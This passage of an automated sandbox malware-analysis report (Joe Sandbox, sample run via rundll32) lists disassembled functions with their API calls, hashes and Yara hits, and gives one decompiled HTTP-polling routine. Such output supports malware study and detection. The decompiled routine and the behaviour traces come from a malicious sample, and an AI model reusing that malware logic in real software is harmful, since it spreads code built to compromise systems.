                                • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0347A7C4,?,?,?,?,?), ref: 0348646D
                                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,0347A7C4,?,?,?,?,?), ref: 03486487
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                • String ID:
                                • API String ID: 316328430-0
                                • Opcode ID: b892bb072176cff6ddc942b09a3b12aab8c0f23f93039b2d68fe6766fcfe0908
                                • Instruction ID: 27e89e6dbb0f0babf9dcd7dec430c93d6dc388e20e6163ee9f6febe28200bcab
                                • Opcode Fuzzy Hash: b892bb072176cff6ddc942b09a3b12aab8c0f23f93039b2d68fe6766fcfe0908
                                • Instruction Fuzzy Hash: C821AC3150020AFFCF12AFA1EC09E8F7BB9EB05300F258063BA04AA160D7719964EF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347D922 Relevance: 12.1, APIs: 8, Instructions: 57registrymemorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(0348E453,00000000,00000000,0349A440,?,?,0347F68B,0348E453,00000000,0348E453,0349A420), ref: 0347D935
                                • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0347D943
                                • wsprintfA.USER32 ref: 0347D95F
                                • RegCreateKeyA.ADVAPI32(80000001,0349A420,00000000), ref: 0347D977
                                • lstrlen.KERNEL32(?), ref: 0347D986
                                • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 0347D994
                                • RegCloseKey.ADVAPI32(?), ref: 0347D99F
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0347D9AE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                                • String ID:
                                • API String ID: 1575615994-0
                                • Opcode ID: 7a8af4c14699da4fae230afc1db517235576a4ccb3f1f253e18fb76664d9f58c
                                • Instruction ID: 78104f3fc15551659230967f5d5ad0ed84f3b5eeb739e34bd147988e1a8952e2
                                • Opcode Fuzzy Hash: 7a8af4c14699da4fae230afc1db517235576a4ccb3f1f253e18fb76664d9f58c
                                • Instruction Fuzzy Hash: E1116172100108BFEB116F94EC49EAA3BBDFB59714F114026FA04EA154E7729D14DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348FE06 Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000040,00000000,?), ref: 0348FE12
                                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0348FE30
                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0348FE38
                                • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0348FE56
                                • GetLastError.KERNEL32 ref: 0348FE6A
                                • RegCloseKey.ADVAPI32(?), ref: 0348FE75
                                • CloseHandle.KERNEL32(00000000), ref: 0348FE7C
                                • GetLastError.KERNEL32 ref: 0348FE84
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                • String ID:
                                • API String ID: 3822162776-0
                                • Opcode ID: 6bcb99422b517228844a9e228617cdcdbdf94a778fa5061c73de4d704020d1bf
                                • Instruction ID: edc30682920d00bae8075f175b20dd983cf62dd78b14f5b2590abb2ecd7578e4
                                • Opcode Fuzzy Hash: 6bcb99422b517228844a9e228617cdcdbdf94a778fa5061c73de4d704020d1bf
                                • Instruction Fuzzy Hash: 35116176100208FFDB02BFA5E849ABA3BA9FF55351F244016FE05DE245DB31C919CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347941B Relevance: 11.5, APIs: 9, Instructions: 298COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 3eaa3df1c4b4d24fc802b3e3daa69273750afc7405a6762e40c86ac51743304d
                                • Instruction ID: 9b40121c4a9b440925af38aeb4b37486f7e1c45e936c6f568666e787c5bac404
                                • Opcode Fuzzy Hash: 3eaa3df1c4b4d24fc802b3e3daa69273750afc7405a6762e40c86ac51743304d
                                • Instruction Fuzzy Hash: DCB11775C00229EFDF21EF95CC48AEEBBB8EF05314F194066E811BB260D7355A45CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034923FD Relevance: 11.5, APIs: 9, Instructions: 296COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.NTDLL(?,?,0000000D,?,?,00000000,?,?,?,?,?,?,?,?,03492801,?), ref: 0349242E
                                • memcpy.NTDLL(?,?,0000000D,?,?,0000000D,?,?,00000000), ref: 0349243B
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • memcpy.NTDLL(00000000,?,?,00000008,?,00000001,03492801,00000000,00000001,?,?,?,?,03492801,?,00000000), ref: 034925C9
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memcpy$AllocateHeap
                                • String ID:
                                • API String ID: 4068229299-0
                                • Opcode ID: 5394d95425725e6a6006762145373b5f0434d0ea016bf7926fffa52d99b23905
                                • Instruction ID: cab94a3f25afc26f637e597c663ff3247ab0d8b6e809bd5145c62e20f1163b95
                                • Opcode Fuzzy Hash: 5394d95425725e6a6006762145373b5f0434d0ea016bf7926fffa52d99b23905
                                • Instruction Fuzzy Hash: 12B12975A0020EBBEF11EF95CD80EEF7BB9AF04204F044557E914AF250E7B0DA158BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347BA6B Relevance: 10.7, APIs: 7, Instructions: 165stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetCommandLineA.KERNEL32(034960F0,00000038,0347E22A,00000000,76CDF5B0,03480348,?,00000001,?,?,?,?,?,?,?,03479100), ref: 0347BA7C
                                • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 0347BA8D
                                  • Part of subcall function 0347D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0347DA7B,?), ref: 0347D4E3
                                  • Part of subcall function 0347D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0347D506
                                  • Part of subcall function 0347D4DA: memset.NTDLL ref: 0347D515
                                • ExitProcess.KERNEL32 ref: 0347BC6F
                                  • Part of subcall function 0347A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,0616C304,00000000,?,03476584,?), ref: 0347A90E
                                  • Part of subcall function 0347A8E9: StrTrimA.SHLWAPI(00000020,03495FCC,00000000,?,03476584,?), ref: 0347A92D
                                  • Part of subcall function 0347A8E9: StrChrA.SHLWAPI(00000020,?,?,03476584,?), ref: 0347A939
                                • lstrcmp.KERNEL32(?,?), ref: 0347BAFB
                                • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,03479100,?), ref: 0347BB13
                                  • Part of subcall function 03474BC4: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0616B7F0,?,?,0348B7F2,0000003A,0616B7F0,?,0348A2EB,00000001,?,00000000,00000000), ref: 03474C04
                                  • Part of subcall function 03474BC4: CloseHandle.KERNEL32(000000FF,?,?,0348B7F2,0000003A,0616B7F0,?,0348A2EB,00000001,?,00000000,00000000,00000000,?,0347109E,03499F2C), ref: 03474C0F
                                • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,03479100,?), ref: 0347BB85
                                • lstrcmp.KERNEL32(?,?), ref: 0347BB9E
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                                • String ID:
                                • API String ID: 739714153-0
                                • Opcode ID: 31c9823c881aa5b5c109282734eac6ac20ff2874e90e66862e33732edf3f0583
                                • Instruction ID: d40eaf0e4cfb55116822f0c44bed7ee678fa2778ab271e3fb0a17d23a191832b
                                • Opcode Fuzzy Hash: 31c9823c881aa5b5c109282734eac6ac20ff2874e90e66862e33732edf3f0583
                                • Instruction Fuzzy Hash: A6512A71900219EFDF21EBA5CC89AEEBBB9EF09700F18445BE501BE254DB359941CB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348948C Relevance: 10.6, APIs: 7, Instructions: 138memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 034894B7
                                • StrTrimA.SHLWAPI(00000000,?), ref: 034894D4
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03489507
                                • RtlImageNtHeader.NTDLL(00000000), ref: 03489532
                                • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 034895F7
                                  • Part of subcall function 0347D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0347DA7B,?), ref: 0347D4E3
                                  • Part of subcall function 0347D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0347D506
                                  • Part of subcall function 0347D4DA: memset.NTDLL ref: 0347D515
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 034895A8
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 034895D7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                • String ID:
                                • API String ID: 239510280-0
                                • Opcode ID: 3b681278b4f77e9f690ec909ff95aa492f75066eb39f86f493a23aea07a8b79f
                                • Instruction ID: c3726b755c0560f2d2aa5ccb3a86743e4ffdb093b8fa0d1d38d36ea0578822b0
                                • Opcode Fuzzy Hash: 3b681278b4f77e9f690ec909ff95aa492f75066eb39f86f493a23aea07a8b79f
                                • Instruction Fuzzy Hash: BB41CF32A01605BFDB22FF95CC45FAE7AA9EF45740F140067FA04AE280DBB19A41D758
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348D698 Relevance: 10.6, APIs: 7, Instructions: 126memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D6F2
                                • lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D710
                                • RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0348D73C
                                • memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D753
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348D766
                                • memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D775
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,00000001,00000001,?,03471785,?,?,?), ref: 0348D7D9
                                  • Part of subcall function 0347F307: RtlLeaveCriticalSection.NTDLL(?), ref: 0347F384
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                                • String ID:
                                • API String ID: 1635816815-0
                                • Opcode ID: 831b460b9e2613ddfc0e0278bebbde6ce28a946e6a48333832d1c5e2a9025c5f
                                • Instruction ID: dc5babc857a57aca6ea8dfdb6ae08baf94a72fb8cfd73ee1af633762d986f121
                                • Opcode Fuzzy Hash: 831b460b9e2613ddfc0e0278bebbde6ce28a946e6a48333832d1c5e2a9025c5f
                                • Instruction Fuzzy Hash: 0C41A135901218AFDB22FFA5CC84B9FBBA9EF06350F15406BE805AF2A0D770D944DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03491AAC Relevance: 10.6, APIs: 7, Instructions: 124threadstringCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 03491AED
                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 03491B1B
                                • GetWindowThreadProcessId.USER32(?,?), ref: 03491B60
                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 03491B88
                                • _strupr.NTDLL ref: 03491BB3
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 03491BC0
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 03491BDA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                                • String ID:
                                • API String ID: 3831658075-0
                                • Opcode ID: 15353aec71319531553b4f4851a9f3876fcd56f37c1a57656a40189da5505d92
                                • Instruction ID: 09607ba5618a8897c37be1e72160b50c889045fed442ba02eafcb0e516daf308
                                • Opcode Fuzzy Hash: 15353aec71319531553b4f4851a9f3876fcd56f37c1a57656a40189da5505d92
                                • Instruction Fuzzy Hash: 87414C71D00219EFEF21DFA5CC49BEEBFB9AB48701F14419BE601AA250D7749640CF94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348458D Relevance: 10.6, APIs: 7, Instructions: 124registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlImageNtHeader.NTDLL ref: 034845B6
                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 034845F9
                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03484614
                                • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 0348466A
                                • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 034846C6
                                • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 034846D4
                                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 034846DF
                                  • Part of subcall function 034726D3: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 034726E7
                                  • Part of subcall function 034726D3: memcpy.NTDLL(00000000,?,?,?), ref: 03472710
                                  • Part of subcall function 034726D3: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 03472739
                                  • Part of subcall function 034726D3: RegCloseKey.ADVAPI32(?), ref: 03472764
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                                • String ID:
                                • API String ID: 3181710096-0
                                • Opcode ID: f8c11e1d8359ff1d55234b6d8cedfa685ae7e79f4b1e7f7b20d9b353e3949fea
                                • Instruction ID: 04bfd1238424bed5400603c2abc051b2dfcfb12d969ad0b4dc4a78a2440c234a
                                • Opcode Fuzzy Hash: f8c11e1d8359ff1d55234b6d8cedfa685ae7e79f4b1e7f7b20d9b353e3949fea
                                • Instruction Fuzzy Hash: 6841A031600206AFDB21EF66D889B6F7BE8EF50340F18402BE901FE364DB34D905CA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034848FD Relevance: 10.6, APIs: 7, Instructions: 110memoryfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                  • Part of subcall function 0348508C: GetCurrentThreadId.KERNEL32 ref: 034850C4
                                  • Part of subcall function 0348508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                  • Part of subcall function 0348508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                  • Part of subcall function 0348508C: lstrcpy.KERNEL32(00000000), ref: 03485100
                                • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 03484943
                                • StrTrimA.SHLWAPI(?,?), ref: 03484961
                                • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 034849CA
                                • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 034849EB
                                • DeleteFileA.KERNEL32(?,00003219), ref: 03484A0D
                                • HeapFree.KERNEL32(00000000,?), ref: 03484A1C
                                • HeapFree.KERNEL32(00000000,?,00003219), ref: 03484A34
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                                • String ID:
                                • API String ID: 1078934163-0
                                • Opcode ID: d8bd981f9cc908c27c008a7795edb827a0911c2a8f8c1b4323f5809578403255
                                • Instruction ID: 446fbe201943cb34386f89060e2adf20b0fef91d9fba7285283570eb139615ec
                                • Opcode Fuzzy Hash: d8bd981f9cc908c27c008a7795edb827a0911c2a8f8c1b4323f5809578403255
                                • Instruction Fuzzy Hash: 6831DD32104206AFD711FF69DC06F6BB7E8EB56744F09005BFA44EF240D724E8068BAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347E011 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,03478478,00000000), ref: 0347E02B
                                • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 0347E040
                                • memset.NTDLL ref: 0347E04D
                                • HeapFree.KERNEL32(00000000,00000000,?,03478477,?,?,00000000,?,00000000,03489CD0,?,00000000), ref: 0347E06A
                                • memcpy.NTDLL(?,?,03478477,?,03478477,?,?,00000000,?,00000000,03489CD0,?,00000000), ref: 0347E08B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Allocate$Freememcpymemset
                                • String ID: chun
                                • API String ID: 2362494589-3058818181
                                • Opcode ID: d63ebfe1d8bd25e9a1cc3f901ccec614f23ce1514bdf618fda9a4665d8ef616f
                                • Instruction ID: 6b60a9a8c82f5f9de4bf5e2edf2b3d26450adbcff5903de436e3c329512075ad
                                • Opcode Fuzzy Hash: d63ebfe1d8bd25e9a1cc3f901ccec614f23ce1514bdf618fda9a4665d8ef616f
                                • Instruction Fuzzy Hash: 8031BC71600305AFDB30DF66C881A97BBEDEF15210F05866BE949DF221D730E945CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03434A85 Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E03434A85(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E03436D63(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E03436C2C(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E03436E40( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                                0x03434a85
                                0x03434a85
                                0x03434a95
                                0x03434a98
                                0x03434a9c
                                0x03434aa2
                                0x03434aa7
                                0x03434ac0
                                0x03434ad4
                                0x03434adb
                                0x03434ae2
                                0x03434b35
                                0x03434b3b
                                0x03434b41
                                0x03434b7c
                                0x03434b82
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03434b41
                                0x03434ae8
                                0x00000000
                                0x03434aef
                                0x03434afd
                                0x03434b00
                                0x03434b03
                                0x03434b0f
                                0x03434b13
                                0x03434b75
                                0x03434b15
                                0x03434b27
                                0x03434b65
                                0x03434b70
                                0x03434b29
                                0x03434b2c
                                0x03434b30
                                0x03434b30
                                0x03434b27
                                0x00000000
                                0x03434b13
                                0x03434ae8
                                0x03434aac
                                0x03434ab2
                                0x03434ab5
                                0x03434aba
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03434b4a
                                0x03434b52
                                0x03434b57
                                0x03434b5a
                                0x00000000

                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76CC81D0,00000000,00000000), ref: 03434A9C
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?), ref: 03434AAC
                                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 03434ADE
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03434B03
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03434B23
                                • GetLastError.KERNEL32 ref: 03434B35
                                  • Part of subcall function 03436E40: WaitForMultipleObjects.KERNEL32(00000002,03437BB5,00000000,03437BB5,?,?,?,03437BB5,0000EA60), ref: 03436E5B
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                • GetLastError.KERNEL32(00000000), ref: 03434B6A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                • String ID:
                                • API String ID: 3369646462-0
                                • Opcode ID: 63fa0f5f929695df88c3e98f80975cb3567bddbcf5de0b0e292c2ddc1578e3a5
                                • Instruction ID: 743fa55481ae680e92ab41dda4d62d269d0d98f024749c393f232c7f80398cde
                                • Opcode Fuzzy Hash: 63fa0f5f929695df88c3e98f80975cb3567bddbcf5de0b0e292c2ddc1578e3a5
                                • Instruction Fuzzy Hash: 34310CB5900309EFDB21EFE6C884ADEBBB8EF0D200F1449AAD542EB340D7719A449F54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03478EAF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                  • Part of subcall function 0348508C: GetCurrentThreadId.KERNEL32 ref: 034850C4
                                  • Part of subcall function 0348508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                  • Part of subcall function 0348508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                  • Part of subcall function 0348508C: lstrcpy.KERNEL32(00000000), ref: 03485100
                                • lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 03478ED3
                                  • Part of subcall function 0347A5E7: lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,03478EF7,?,00000000,000000FF), ref: 0347A5F8
                                  • Part of subcall function 0347A5E7: lstrlen.KERNEL32(?,?,?,?,03478EF7,?,00000000,000000FF), ref: 0347A5FF
                                  • Part of subcall function 0347A5E7: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0347A611
                                  • Part of subcall function 0347A5E7: _snprintf.NTDLL ref: 0347A637
                                  • Part of subcall function 0347A5E7: _snprintf.NTDLL ref: 0347A66B
                                  • Part of subcall function 0347A5E7: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 0347A688
                                • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,?,00000000,000000FF), ref: 03478F6D
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,000000FF), ref: 03478F8A
                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,000000FF), ref: 03478F92
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF), ref: 03478FA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                • String ID: s:
                                • API String ID: 2960378068-2363032815
                                • Opcode ID: 43ab7a455d33d4648366dddab8c10384f14798297589ff64211397abf7419e0a
                                • Instruction ID: 09a8781dc7aaca017fc88cd6e1b22e17b8977bbb107ab88d3f226c865c403f07
                                • Opcode Fuzzy Hash: 43ab7a455d33d4648366dddab8c10384f14798297589ff64211397abf7419e0a
                                • Instruction Fuzzy Hash: 5A316F72900209BFDB11EFE9CC85FDFBBFCAB19210F14059AA605EA245E770A6058B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034713E0 Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 034713F6
                                • lstrcmpiW.KERNEL32(00000000,?), ref: 0347142E
                                • lstrcmpiW.KERNEL32(?,?), ref: 03471443
                                • lstrlenW.KERNEL32(?), ref: 0347144A
                                • CloseHandle.KERNEL32(?), ref: 03471472
